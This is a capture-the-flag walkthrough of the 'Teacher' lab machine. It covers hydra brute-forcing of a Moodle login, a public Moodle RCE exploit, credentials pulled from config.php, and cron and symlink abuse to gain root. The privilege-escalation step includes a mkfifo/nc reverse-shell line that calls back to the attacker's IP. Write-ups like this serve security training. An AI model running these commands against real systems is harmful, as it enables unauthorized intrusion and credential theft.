Teacher

August 9th, 2020

Teacher logo

This is an easy linux box

Tools used

  • cat
  • cd
  • chmod
  • crontab
  • crunch
  • ffuf
  • grep
  • hydra
  • ln
  • ls
  • mysql
  • nc
  • nmap
  • php
  • pspy64
  • python
  • searchsploit
  • su
  • wget
  • whoami

Reconnaissance

Nmap

nmap -sC -sV -oA teacher 10.10.10.153 -v

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Here’s what nmap teaches us :

  • port 80 (HTTP) - Apache 2.4.25

Since there is only the web port open, let’s see it :

Website

Let search for files/directories :

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.153/FUZZ -e .txt,.php,.html -t 100

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.153/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

index.html              [Status: 200, Size: 8022, Words: 514, Lines: 250]
gallery.html            [Status: 200, Size: 8254, Words: 359, Lines: 205]
images                  [Status: 301, Size: 313, Words: 20, Lines: 10]
css                     [Status: 301, Size: 310, Words: 20, Lines: 10]
manual                  [Status: 301, Size: 313, Words: 20, Lines: 10]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10]
javascript              [Status: 301, Size: 317, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 312, Words: 20, Lines: 10]
phpmyadmin              [Status: 403, Size: 297, Words: 22, Lines: 12]
moodle                  [Status: 301, Size: 313, Words: 20, Lines: 10]

I see two interesting directories :

  • phpmyadmin - can’t access
  • moodle - can access

Moodle CMS

I have a possible username : “Giovanni Chhatta”.

Moodle login page

There is a login page and I have possibles login. Need a password now ! From here I search on every page for some information, but found nothing. I didn’t like this part, because it’s not realist at all. I downloaded all the website :

wget -r http://10.10.10.153/

Then I grep everything to search for a password :

grep -Ri pass
[...]
images/5.png:I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
[...]

I now have a password, but the last character is missing. I used crunch to generate a wordlist with the password and every printable character as the last part :

crunch 15 15 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -t Th4C00lTheacha@ -o passwords.txt
Crunch will now generate the following amount of data: 1504 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 94 

crunch: 100% completed generating output

Then I used hydra to brute force the credentials :

hydra -l giovanni -P ./passwords.txt 10.10.10.153 http-post-form '/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login' -Vv -q
[...]
[80][http-post-form] host: 10.10.10.153   login: giovanni   password: Th4C00lTheacha#
[...]

The right crendentials are :

login : giovanni
password : Th4C00lTheacha#

Moodle connected

Let’s search for known exploit :

Searchsploit moodle

Exploit

Since I couldn’t found the install version, I tried the php RCE :

searchsploit -m php/webapps/46551.php

Start a nc listener :

nc -lvp 1234

Then launch the exploit with the good parameters :

php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass='Th4C00lTheacha#' ip=10.10.14.4 port=1234 course=2

*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*

[!] Make sure you have a listener
[!] at 10.10.14.4:1234

[*] Logging in as user giovanni with password Th4C00lTheacha# 
[+] Successful Login
[>] Moodle Session 83n6n9g0q1q2e499ag2588mqq3 
[>] Moodle Key bZKU9HH0wV 
[*] Loading Course ID 2 
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page 
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question 
[+] Successfully Added Calculation Question
[*] Adding Evil Question 
[+] Successfully Created Evil Question
[*] Sending Exploit

[>] You should receive a reverse shell attempt from the target at 10.10.14.4 on port 1234 
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.

Go to the listener :

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.153: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.153] 38516
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Nice, I have a reverse shell ! Let’s escalate to another user. Searching for privilege escalation path, I stumble upon this config file containing database credentials :

www-data@teacher:/var/www/html/moodle$ cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
[...]

So I tried to connect with them and search for interesting stuff. I found a backup hashed password for the user giovanni :

Database connected

I tried to crack it :

Sha cracked

I now have a new password for the user giovanni : expelled. Let’s try it :

www-data@teacher:/var/www/html/moodle$ su giovanni
Password: 
giovanni@teacher:/var/www/html/moodle$ whoami
giovanni

I’m now connected as giovanni ! Let’s escalate to root now. Looking around I found this directory :

giovanni@teacher:~$ ls -l 
ls -l 
total 8
-rw-r--r-- 1 giovanni giovanni   33 Jun 27  2018 user.txt
drwxr-xr-x 4 giovanni giovanni 4096 Jun 27  2018 work

giovanni@teacher:~$ cd work
cd work

giovanni@teacher:~/work$ ls -l
ls -l
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp

giovanni@teacher:~/work$ ls -l *
ls -l *
courses:
total 4
drwxr-xr-x 2 root root 4096 Jun 27  2018 algebra

tmp:
total 8
-rwxrwxrwx 1 root root  256 Aug  7 10:00 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Jun 27  2018 courses

Every one minute the backup_courses.tar.gz is updating, there must be a cronjob running :

giovanni@teacher:~/work$ crontab -l
crontab -l
no crontab for giovanni

giovanni@teacher:~/work$ crontab -u root -l
crontab -u root -l
must be privileged to use -u

Can’t see the cronjob running. Let’s use pspy to see it ! Start python server :

python -m simpleHTTPServer

Upload it to the machine :

wget http://10.10.14.4:8000/pspy64

Run it :

chmod +x pspy64
./pspy64

Pspy

Here’s the script which is running every minute :

/bin/bash /usr/bin/backup.sh
tar -czvf tmp/backup_courses.tar.gz courses/algebra

The backup script :

giovanni@teacher:~/work/courses$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

I can get the root flag by adding a symlink to /root in the tmp directory, because everything that is in /work/tmp get “chmod 777”.

Make a symlink in /work/tmp :

giovanni@teacher:~/work/tmp$ ln -s /root

Wait one minute :

ls -l /
[...]
drwxrwxrwx  3 root root  4096 Nov  8  2018 root
[...]

And now I can read the flag. Now how do I get a shell :

giovanni@teacher:~/work/tmp$ ln -s / exploit

Wait one minute and I can edit anything :

giovanni@teacher:/$ cat /usr/bin/backup.sh 
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 12345 >/tmp/f

nc -lvp 12345

Wait again and 1 minute later I get the reverse shell back !

nc -lvp 12345
listening on [any] 12345 ...
10.10.10.153: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.153] 38278
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Flags

User.txt

giovanni@teacher:~$ cat user.txt 
fa9ae187462530e841d9e61936648fa7

Root.txt

giovanni@teacher:/root$ cat root.txt
4f3a83b42ac7723a508b8ace7b8b1209